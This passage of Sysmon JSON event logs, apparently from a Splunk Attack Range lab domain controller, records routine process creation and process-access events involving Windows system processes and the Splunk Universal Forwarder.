{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6194,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11FC-5F25-0000-0010DE170900}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11FC-5F25-0000-0010DE170900}","TargetProcessId":"5036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6195,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nProcessGuid: {E2A3D6B1-11FD-5F25-0000-001083190900}\r\nProcessId: 3212\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","ProcessGuid":"{E2A3D6B1-11FD-5F25-0000-001083190900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6197,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.252","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.252\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 